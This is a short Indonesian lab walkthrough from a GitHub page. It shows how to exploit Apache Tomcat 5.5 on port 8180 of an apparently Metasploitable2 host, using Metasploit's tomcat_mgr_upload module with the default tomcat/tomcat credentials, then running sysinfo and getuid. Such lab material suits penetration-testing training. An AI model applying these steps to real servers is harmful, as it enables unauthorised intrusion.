Skip to content

Latest commit

 

History

History
53 lines (38 loc) · 1.89 KB

Exploit Port 8180 Tomcat.md

File metadata and controls

53 lines (38 loc) · 1.89 KB

Exploit port 8180 (Tomcat)

  • Buka halaman http://192.168.1.114:8180 melalui browser, maka disini dapat dilihat bahwa server tersebut menggunakan apache tomcat versi 5.5

alt text

  • Buka msfconsole di terminal
msfconsole

alt text

  • Cari modul untuk exploit apache tomcat versi 5.5
search tomcat 5.5

alt text

  • Gunakan modul exploit/multi/http/tomcat_mgr_upload yang berada di nomor urut 2 dari hasil pencarian
use <nomor_modul>

alt text

  • Tampilkan daftar parameter yang dibutuhkan di modul tersebut
show options

alt text

  • Isi parameter yang dibutuhkan di modul tersebut
set rhosts <IP_metasploitable2>
set rport 8180
set HttpUsername tomcat
set HttpPassword tomcat

alt text

  • Setelah pengisian parameter selesai jalankan modul tersebut. Disini exploit berhasil mengakses masuk ke dalam server
exploit

alt text

  • Gunakan perintah sysinfo untuk melihat versi sistem operasi server. Ketik perintah getuid untuk mengetahui nama user yang berhasil masuk ke server

alt text